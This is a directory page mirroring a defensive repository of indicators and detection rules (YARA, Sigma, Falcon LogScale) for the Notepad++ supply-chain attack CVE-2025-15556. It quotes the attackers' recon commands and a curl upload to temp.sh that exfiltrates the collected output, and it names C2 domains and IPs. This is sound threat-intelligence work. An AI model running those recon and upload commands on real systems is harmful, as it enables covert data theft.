Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
notepadpp-supply-chain-iocs — IoCs e regras de detecção para o ataque à cadeia de suprimentos do Notepad++ (CVE-2025-15556) — Lotus Blossom APT, junho–dezembro de 2025. Inclui consultas Falcon LogScale, regras YARA/Sigma e mapeamento MITRE ATT&CK. | Kitploit
Ferramentas/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
Gerenciamento de Indicadores de Comprometimento (IOC)Feeds e Agregadores de AmeaçasAnálise de VulnerabilidadesAnálise ForenseAnálise de MalwareInteligência de AmeaçasSegurança da Cadeia de SuprimentosAprendizado e EducaçãoResposta a Incidentes

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

IoCs e regras de detecção para o ataque à cadeia de suprimentos do Notepad++ (CVE-2025-15556) — Lotus Blossom APT, junho–dezembro de 2025. Inclui consultas Falcon LogScale, regras YARA/Sigma e mapeamento MITRE ATT&CK.

Ver Repositório
14há 7 mesesAinda não revisado
Compartilhar

Ataque à Cadeia de Suprimentos do Notepad++ — Repositório de IoCs

CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | Junho – Dezembro de 2025

Last Updated IoC Count License: MIT MITRE ATT&CK


Visão Geral

Este repositório contém uma coleção abrangente e consolidada de Indicadores de Comprometimento (IoCs) relacionada ao ataque à cadeia de suprimentos do Notepad++ divulgado em 2 de fevereiro de 2026.

Entre junho e dezembro de 2025, um ator de ameaça patrocinado pelo Estado chinês comprometeu a infraestrutura de hospedagem do Notepad++, sequestrando o mecanismo de atualização integrado (WinGUp) para entregar seletivamente instaladores trojanizados a usuários-alvo. O ataque explorou a ausência de verificação criptográfica no atualizador (pré-v8.8.9), permitindo a distribuição de backdoors personalizados, Beacons Cobalt Strike e payloads do Metasploit.

Fatos principais

CVECVE-2025-15556 — Download de código sem verificação de integridade
Ator de AmeaçaLotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon)
Período AtivoJunho de 2025 – 2 de dezembro de 2025
Vetor de AtaqueComprometimento da cadeia de suprimentos via atualizador automático WinGUp
AlvosGoverno, telecomunicações, serviços financeiros, provedores de TI (Filipinas, Vietnã, El Salvador, Austrália, Leste Asiático)
MalwareBackdoor Chrysalis (personalizado), Beacon Cobalt Strike, Meterpreter do Metasploit
Corrigido emNotepad++ v8.8.9+ (verificação de certificado) / v8.9.1+ (validação XMLDSig)

Cadeias de Infecção

A Kaspersky GReAT identificou três cadeias de infecção distintas, rotacionadas aproximadamente mensalmente para evadir a detecção:

Cadeia #1 — Julho/Agosto de 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → ProShow.exe (legitimate) → exploit via "load" file
  → Metasploit downloader → Cobalt Strike Beacon
  • Abusa de uma vulnerabilidade antiga no software ProShow em vez de DLL sideloading
  • Reconhecimento: whoami && tasklist → exfiltrado via temp.sh
  • Diretório de trabalho: %appdata%\ProShow\

Cadeia #2 — Setembro/Outubro de 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → script.exe (Lua interpreter) → alien.ini (compiled Lua)
  → shellcode via EnumWindowStationsW → Metasploit downloader → Cobalt Strike Beacon
  • Usa um interpretador Lua legítimo para executar shellcode compilado
  • Reconhecimento expandido: whoami && tasklist && systeminfo && netstat -ano
  • Diretório de trabalho: %appdata%\Adobe\Scripts\

Cadeia #3 — Outubro de 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → BluetoothService.exe (legitimate) → log.dll (sideloaded)
  → decrypts "BluetoothService" shellcode → Chrysalis backdoor
  • Técnica clássica de DLL sideloading
  • Sem reconhecimento integrado (diferente das cadeias 1 e 2)
  • Diretório de trabalho: %appdata%\Bluetooth\
  • Beacon Cobalt Strike associado encontrado em C:\ProgramData\USOShared\
root@kitploit:~
                     ┌─────────────────────────────────────────────────────────┐
                     │              COMPROMISE TIMELINE                        │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │  Jul 25 │  Aug 25 │  Sep 25 │  Oct 25 │  Nov 25 │Dec 25│
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  Chain #1 (ProShow) │████████████████████                                    │
  Chain #2 (Lua)     │                    █████████████████████████████        │
  Chain #3 (DLL SL)  │                              ██████████████            │
  Infra access       │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

Conteúdo do Repositório

ArquivoDescrição
notepadpp_supply_chain_iocs.csvConjunto completo de dados de IoCs (105 indicadores) com mapeamento MITRE ATT&CK

Esquema do CSV

ColunaDescrição
ioc_typeTipo: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window
ioc_valueO valor do indicador
chainCadeia de infecção (1, 2, 3, 1/2, 2/3, all, n/a)
contextDescrição do que o IoC representa
sourceFonte de inteligência (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont)
riskSeveridade (CRITICAL, HIGH, MEDIUM, LOW, INFO)
mitre_techniqueID da técnica MITRE ATT&CK

Detecção e Caça a Ameaças

Indicadores prioritários (comece por aqui)

Comportamentais — independentes de IoC, maior valor:

  • gup.exe gerando qualquer processo filho que não seja um instalador legítimo e assinado do Notepad++
  • gup.exe conectando-se a domínios/IPs diferentes de notepad-plus-plus.org, github.com, release-assets.githubusercontent.com
  • Criação de diretórios: %appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\
  • Criação de %localappdata%\Temp\ns.tmp\ (runtime do NSIS — presente em todas as cadeias)

Rede — alta confiança:

  • Resolução de DNS de cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com
  • Conexões com temp.sh (51.91.79.17) — especialmente com upload de arquivo via curl
  • Requisições HTTP com URLs do temp.sh embutidas no cabeçalho User-Agent
  • Conexões de saída para 45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210

Comandos de reconhecimento (pós-exploração):

root@kitploit:~
cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

Consultas do CrowdStrike Falcon LogScale

Comportamental: caça a processos filhos do GUP.exe
root@kitploit:~
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
Caça multi-IoC em eventos de processo, rede e DNS
root@kitploit:~
#event_simpleName=/(ProcessRollup2|NetworkConnectIP4|DnsRequest)/ event_platform=Win
| case {
    // Malicious IPs
    RemoteAddressIP4=/(95\.179\.213\.0|61\.4\.102\.97|59\.110\.7\.32|124\.222\.137\.114|45\.76\.155\.202|45\.32\.144\.255|45\.77\.31\.210)/
        | iocType := "Malicious IP" | iocValue := RemoteAddressIP4 | riskScore := "HIGH";
    // Malicious Domains
    DomainName=/(api\.skycloudcenter\.com|api\.wiresguard\.com|cdncheck\.it\.com|safe-dns\.it\.com|self-dns\.it\.com|temp\.sh)/i
        | iocType := "Malicious Domain" | iocValue := DomainName | riskScore := "HIGH";
    // Suspicious filenames
    ImageFileName=/\\(BluetoothService|admin|system|loader1|loader2|s047t5g|ConsoleApplication2|3yzr31vk|uffhxpSy)\.exe$/i
        | iocType := "Suspicious Filename" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Suspicious DLLs
    ImageFileName=/\\(log\.dll|libtcc\.dll)$/i
        | iocType := "Suspicious DLL" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Chain-specific artifacts
    ImageFileName=/\\(alien\.ini|load)$/i
        | iocType := "Chain Artifact" | iocValue := ImageFileName | riskScore := "HIGH";
    * | iocType := null;
}
| iocType=*
| ImageFileName=/\\(?<FileName>[^\\]+)$/
| table([riskScore, iocType, iocValue, @timestamp, aid, ComputerName, FileName, ImageFileName, CommandLine, SHA256HashData, RemoteAddressIP4, DomainName], limit=5000)
Detecção de instalador NSIS (todas as cadeias)
root@kitploit:~
#event_simpleName=DirectoryCreate event_platform=Win
| FilePath=/\\ns\.tmp$/i
| FilePath=/\\Temp\\ns\.tmp$/i
| groupBy([aid, ComputerName, FilePath, ContextTimeStamp], limit=5000)

Regra YARA (padrão NSIS + reconhecimento)

Regra YARA para atualizador NSIS malicioso
root@kitploit:~
rule Notepadpp_SupplyChain_MaliciousUpdater {
    meta:
        description = "Detects malicious NSIS installers from Notepad++ supply chain attack"
        author = "Renato Z3r0 ed i miei sorcini"
        date = "2026-02"
        reference = "https://securelist.com/notepad-supply-chain-attack/118708/"
        tlp = "WHITE"
        
    strings:
        $nsis = "Nullsoft.NSIS" ascii
        $recon1 = "whoami" ascii nocase
        $recon2 = "tasklist" ascii nocase
        $recon3 = "systeminfo" ascii nocase
        $recon4 = "netstat -ano" ascii nocase
        $exfil = "temp.sh/upload" ascii nocase
        $curl = "curl" ascii nocase
        $dir1 = "\\ProShow\\" ascii nocase
        $dir2 = "\\Adobe\\Scripts\\" ascii nocase
        $dir3 = "\\Bluetooth\\" ascii nocase
        
    condition:
        uint16(0) == 0x5A4D and
        $nsis and
        (2 of ($recon*) or $exfil or ($curl and 1 of ($recon*))) and
        1 of ($dir*)
}

Regras Sigma

Sigma: processo filho suspeito do GUP.exe
root@kitploit:~
title: Notepad++ GUP.exe Suspicious Child Process
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects GUP.exe (Notepad++ updater) spawning suspicious child processes indicative of supply chain compromise
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
tags:
    - attack.initial_access
    - attack.t1195.002
    - cve.2025.15556
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\gup.exe'
    filter_legitimate:
        Image|endswith:
            - '\npp.Installer.x64.exe'
            - '\npp.Installer.exe'
    condition: selection_parent and not filter_legitimate
falsepositives:
    - Legitimate Notepad++ installers with non-standard naming
level: high
Sigma: comandos de reconhecimento com exfiltração via temp.sh
root@kitploit:~
title: Reconnaissance Data Exfiltration via temp.sh
id: b2c3d4e5-f6a7-8901-bcde-f12345678901
status: experimental
description: Detects system reconnaissance followed by data upload to temp.sh, as observed in Notepad++ supply chain attack
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
tags:
    - attack.exfiltration
    - attack.t1567
    - attack.discovery
    - attack.t1082
logsource:
    category: process_creation
    product: windows
detection:
    selection_curl:
        CommandLine|contains:
            - 'temp.sh/upload'
            - 'temp.sh'
        Image|endswith: '\curl.exe'
    condition: selection_curl
falsepositives:
    - Legitimate use of temp.sh file sharing service (rare in corporate environments)
level: high
Sigma: resolução de domínio malicioso
root@kitploit:~
title: Notepad++ Supply Chain C2 Domain Resolution
id: c3d4e5f6-a7b8-9012-cdef-123456789012
status: experimental
description: Detects DNS resolution of C2 domains associated with the Notepad++ supply chain attack
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: dns_query
    product: windows
detection:
    selection:
        QueryName|endswith:
            - 'cdncheck.it.com'
            - 'safe-dns.it.com'
            - 'self-dns.it.com'
            - 'api.skycloudcenter.com'
            - 'api.wiresguard.com'
    condition: selection
falsepositives:
    - Very unlikely in corporate environments
level: critical

Mapeamento MITRE ATT&CK

TacticTechniqueIDUsage in this campaign
Initial AccessSupply Chain Compromise: Compromise Software Supply ChainT1195.002Mecanismo de atualização WinGUp sequestrado
ExecutionCommand and Scripting Interpreter: Windows Command ShellT1059.003Reconhecimento via cmd.exe
ExecutionCommand and Scripting Interpreter: Python/LuaT1059.006Interpretador Lua da cadeia #2
ExecutionExploitation for Client ExecutionT1203Vulnerabilidade ProShow da cadeia #1
ExecutionNative APIT1106EnumWindowStationsW para execução de shellcode
PersistenceHijack Execution Flow: DLL Side-LoadingT1574.002DLL sideloading do log.dll na cadeia #3
Defense EvasionObfuscated Files or InformationT1027Shellcode criptografado, chave XOR "CRAZY"
Defense EvasionMasquerading: Match Legitimate NameT1036.005BluetoothService.exe, update.exe, AutoUpdater.exe
DiscoverySystem Information DiscoveryT1082whoami, systeminfo, tasklist, netstat
CollectionData Staged: Local Data StagingT1074.001Saída do reconhecimento salva em arquivos .txt
Command and ControlApplication Layer Protocol: Web ProtocolsT1071.001C2 via HTTPS usando Cobalt Strike, Chrysalis

Referências

FonteLink
Kaspersky GReAT — Cadeias de execução despercebidas e novos IoCssecurelist.com
Rapid7 — Backdoor Chrysalis: mergulho no kit de ferramentas do Lotus Blossomrapid7.com
Divulgação oficial do Notepad++ — Atualização de informações sobre o incidente de sequestronotepad-plus-plus.org
Kevin Beaumont — Divulgação inicial e atribuiçãoDoublePulsar
Tenable — Perguntas frequentes sobre o comprometimento da cadeia de suprimentos do Notepad++tenable.com
Orca Security — Análise do sequestro de atualização e remediaçãoorca.security
CSO Online — APT chinês em ataque sofisticado à cadeia de suprimentoscsoonline.com

Ações Imediatas

  1. Identifique todos os endpoints com Notepad++ instalado (qualquer versão < 8.9.1)
  2. Procure por gup.exe gerando processos filhos inesperados entre junho e dezembro de 2025
  3. Pesquise nos logs de rede conexões com os domínios e IPs de C2 listados acima
  4. Verifique os artefatos do sistema de arquivos (%appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\)
  5. Atualize o Notepad++ para v8.9.1+ usando um instalador baixado manualmente das versões oficiais do GitHub
  6. Remova quaisquer certificados raiz personalizados antigos instalados por versões anteriores do Notepad++
  7. Isole e faça a triagem de qualquer endpoint que apresente indicadores positivos

Histórico de Alterações

DataAlteração
2026-02-09Lançamento inicial — 105 IoCs consolidados de Kaspersky, Rapid7, CrowdStrike, Tenable

Licença

Este repositório é fornecido sob a Licença MIT. Os IoCs são agregados de fontes públicas apenas para fins defensivos.


Contribuindo

Contribuições são bem-vindas. Se você tiver IoCs adicionais, regras de detecção ou correções:

  1. Faça um fork do repositório
  2. Adicione seus indicadores ao CSV (mantendo o esquema)
  3. Envie um pull request com referências à fonte

Aviso: Este repositório destina-se apenas a fins defensivos de segurança cibernética. Os IoCs e as regras de detecção são fornecidos como estão para ajudar organizações a avaliar sua exposição a este comprometimento da cadeia de suprimentos.

Baixar ferramenta
Command and ControlEncrypted ChannelT1573Configuração criptografada do Beacon CS
Command and ControlIngress Tool TransferT1105Downloader do Metasploit obtendo o Beacon CS
ExfiltrationExfiltration Over Web ServiceT1567Upload para temp.sh